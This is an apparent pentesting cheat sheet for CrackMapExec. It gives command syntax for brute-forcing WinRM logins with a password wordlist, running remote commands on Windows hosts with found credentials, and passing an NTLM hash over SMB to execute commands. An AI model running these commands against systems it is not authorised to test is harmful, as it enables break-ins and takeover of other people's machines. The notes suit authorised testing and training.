CrackMapExec: “A swiss army knife for pentesting networks…”
Supported Protocols: WinRM, MSSQL, SMB, SSH
For help and syntax, just issue the command: crackmapexec or…
crackmapexec -h crackmapexec winrm -h # (for help specific to the winrm protocol) crackmapexec smb -h # (for help specific to the smb protocol)
General Syntax:
crackmapexec <protocol> <target(s)> -u username -p password
Examples:
crackmapexec <protocol> <target(s)> -u username -p 'Admin!123@' # or... crackmapexec <protocol> <target(s)> -u='username' -p='Admin!123@'
Syntax:
crackmapexec winrm [target ip] -u administrator -p /usr/share/.../unix_passwords.txt
You can use the -u switch to specify a file of possible user names to try.
Look over the output (from the top down):
Execute Commands: If you successfully found login credentials, you can crackmapexec to execute arbitrary Windows commands on the target machine. Syntax:
crackmapexec winrm [target ip] -u administrator -p [password]-x "whoami" crackmapexec winrm [target ip] -u administrator -p [password] -x "systeminfo"
You should get some happy feedback along with the results of your command execution.
systeminfo (Windows) takes a while to run but provides a lot of information about your target system.crackmapexec smb [target ip] -u Administrator -H "[administrator ntlm hash; copy-paste]"
This should indicated whether or not it works.
crackmapexec smb [target ip] -u Administrator -H "[administrator ntlm hash; copy-paste]" -x "ipconfig"
It should give you visual feedback about the command execution. And there you go. Execute what you want.